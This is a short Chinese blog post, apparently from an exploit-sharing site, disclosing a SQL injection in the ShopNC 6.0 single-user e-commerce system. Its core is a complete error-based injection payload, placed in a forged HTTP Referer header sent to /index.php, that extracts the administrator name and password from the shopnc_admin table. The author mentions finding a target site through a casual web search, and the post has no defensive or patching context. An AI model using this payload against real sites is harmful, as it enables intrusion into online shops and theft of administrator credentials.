shopnc 6.0 单用户版本 注入

shopnc 6.0 单用户版本

Shopnc 版本有点多啊 都不太记得是哪个了。

ShopNC®天津网城科技有限公司
Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved
津ICP备08000171号

百度随便搜了一个。

这个都不用说了。 伪造HTTP头。

/index.php
[php]
referer:http://0day5.com'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(admin_name,0x3a,admin_password)FROM shopnc_admin limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1)#
[/php]

发表评论